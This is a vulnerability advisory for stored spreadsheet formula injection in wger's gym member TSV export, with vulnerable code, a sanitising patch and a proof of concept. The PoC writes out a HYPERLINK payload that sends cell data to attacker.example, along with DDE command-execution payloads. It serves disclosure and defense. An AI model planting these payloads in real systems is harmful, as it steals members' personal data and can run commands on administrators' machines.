PT-2026-41511 — Remote Code Execution in Pypi Wger

PT-2026-41511 · Pypi · Wger

Published

2026-05-06

Updated

2026-05-06

CVSS v3.1

7.4

High

Vector

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Summary

The gym member TSV export endpoint in wger writes first name and last name profile fields verbatim to TSV cells with no formula-prefix sanitization. Any gym member (including newly self-registered users) can pre-load a spreadsheet formula into their own profile. When a gym admin later exports the member list and opens the file in Excel, LibreOffice Calc, or Google Sheets, the formula executes in the admin's local spreadsheet context — enabling data exfiltration and, on legacy Excel with DDE enabled, arbitrary local code execution.

Details

File: wger/gym/views/export.py, approximately line 73

python

# VULNERABLE - wger/gym/views/export.py
writer.writerow([
  user.id,
  gym.name,
  user.username,
  user.email,
  user.first name,  # written verbatim - no formula prefix sanitization
  user.last name,  # written verbatim
  ...
])

Python's csv.writer does not escape spreadsheet formula triggers (=, +, -, @, t, r). Any gym member can set their first name to =HYPERLINK("http://attacker.example/?p="&A1,"click") via the profile edit endpoint. The string is stored in the database and reproduced without modification in every subsequent TSV export. When a gym admin opens the resulting file in a formula-evaluating spreadsheet application, the formula executes in their local context — outside the wger server boundary.

Affected endpoints:

GET /en/gym/export/users/<gym pk> -> wger.gym.views.export (TSV download)
Profile fields injected via profile edit endpoint (first name/last name)

Suggested patch:

diff

--- a/wger/gym/views/export.py
+++ b/wger/gym/views/export.py
+FORMULA PREFIXES = ('=', '+', '-', '@', 't', 'r')
+
+def sanitise cell(value):
+  """Prefix formula-triggering strings with a single-quote to neutralise."""
+  s = str(value) if value is not None else ''
+  if s and s[0] in FORMULA PREFIXES:
+    return "'" + s
+  return s
+
 writer.writerow([
   user.id,
   gym.name,
   user.username,
   user.email,
-  user.first name,
-  user.last name,
+  sanitise cell(user.first name),
+  sanitise cell(user.last name),
   ...
 ])

Prepending ' to any cell value beginning with =, +, -, or @ is the standard OWASP-recommended mitigation for CSV/TSV formula injection. Apply sanitise cell to all exported user-supplied fields, or subclass csv.writer to apply the sanitization globally for future fields.

PoC

Tested on wger/server:latest Docker image. Test users: gym member (any registered user) and trainer1 (manage gym permission).

Step 1 - Inject formula payload into profile (any gym member, including self-registered):

POST /en/user/<user pk>/overview HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
Cookie: sessionid=[member session]

first name=%3DHYPERLINK%28%22http%3A%2F%2Fattacker.example%2Fx%3Fp%3D%22%26A1%2C%22click%22%29

URL-decoded value: =HYPERLINK("http://attacker.example/x?p="&A1,"click")

Step 2 - Gym admin exports member list:

GET /en/gym/export/users/2 HTTP/1.1
Host: target
Cookie: sessionid=[trainer session]

-> 200 OK
Content-Disposition: attachment; filename=User-data-gym-2-[date].csv

[... header row ...]
2	TestGym1	alice	alice@test.local	=HYPERLINK("http://attacker.example/x?p="&A1,"click")	...

Step 3 - Admin opens TSV in Excel, LibreOffice Calc, or Google Sheets:

Formula cell renders as clickable "click" hyperlink.
On click (or on file-open with DDE-enabled Excel): browser issues GET http://attacker.example/x?p=[cell A1 contents].
Attacker server receives exfiltrated spreadsheet data.

Confirmed during testing: both =cmd|calc.exe!A1 (DDE) and =HYPERLINK(attacker.com) payloads appear raw in the exported TSV response body.

Reproducibility: 2/2 runs after clean-baseline database reset.

Impact

Any gym member (including self-registered users) can inject a spreadsheet formula into their own first name or last name. When a gym administrator with manage gym permission later performs the routine member export and opens the TSV in a formula-evaluating spreadsheet application, the formula executes in the admin's local spreadsheet context:

Data exfiltration: other members' email addresses, phone numbers, and any PII displayed in adjacent cells can be posted to an attacker-controlled URL via HYPERLINK or WEBSERVICE functions.
Local code execution (legacy Excel with DDE enabled): payloads like =cmd|'/c calc.exe'!A1 execute arbitrary commands on the admin's workstation.
Phishing: formulas can display admin-trusted text while silently redirecting on click.

Affected deployments: every wger instance that delegates manage gym to gym admins and where those admins periodically export the member list. The payload is stored persistently and survives indefinitely until the admin performs the export.

Severity: High (CVSS 7.4). Network-reachable, stored payload triggered by legitimate admin workflow, scope unchanged (admin's local context), high confidentiality and integrity loss.

This is a standalone CWE-1236 vulnerability, independent of the None != None cluster of access-control findings. The fix is a small, local sanitization helper.

Fix

RCE

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-1236

Related Identifiers

GHSA-XQ9M-HMP9-FW87

Affected Products

Wger